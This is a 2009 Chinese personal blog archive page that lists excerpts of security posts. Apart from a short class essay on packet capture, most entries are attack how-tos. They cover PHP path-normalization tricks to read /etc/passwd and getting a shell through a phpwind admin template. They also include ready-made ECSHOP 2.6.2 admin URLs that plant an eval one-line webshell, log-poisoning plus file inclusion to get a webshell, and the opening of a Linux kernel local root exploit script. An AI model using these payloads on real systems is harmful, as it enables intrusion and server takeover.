从抓包到嗅探
filed in 搬家之前 on 4.16, 2009
此文是我的计算机网络课作业,拿出来凑凑数。
第一次接触“抓包”这个词应该是在高一的时候,当时刚刚迷上网络安全,经常从《黑客X档案》中看见一些利用抓包技术入侵的文章,最常用的工具就是WsockExpert,
Entries in the ‘搬家之前’ Category:
php文件系统攻击向导
filed in 安全相关, 搬家之前 on 4.12, 2009
一.php文件系统路径正常化攻击
在路径中使用/和/.会使/etc/passwd/或者/etc/passwd/.作为一个文件被打开.
二.php文件系统过程路径截断攻击
PHP有一个路径截断的问题(一个非常邪恶的手段snprintf())只允许使用MAX_PATH被作为打开文件或者目录的鉴定.
phpwind后台拿shell的方法
filed in 搬家之前 on 4.11, 2009
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<
ECSHOP2.6.2后台拿WEBSHELL
filed in 搬家之前 on 4.11, 2009
请勿用于非法用途
利用方法:
http://www.xx. com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
htp://www.xx. com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
http://www.xx .com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
三个链接,随便输入一个就可以了,生成http://www.xx.com/data/integrate__log.php,就是一句话小马了~
PHP本地包含漏洞的新突破口
filed in 安全相关, 搬家之前 on 4.11, 2009
这是一个很好的思路,我们可以随意构造
.php”>http://www.exp.com/index<?/**/eval($_POST[cmd]);/**/?>.php
这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:
http://www.milw0rm.com/exploits/4029
不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,
Linux kernel
filed in 0day, 搬家之前 on 4.09, 2009
#!/bin/sh#################################################################################### gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit # # by Milen Rangelov (gat3way-at-gat3way-dot-eu)## Based on ‘exit_notify()’ CAP_KILL verification bug found by Oleg Nestorov.# Basically it allows us to send arbitrary signals to a privileged (suidroot)# parent process. Due to a [...]
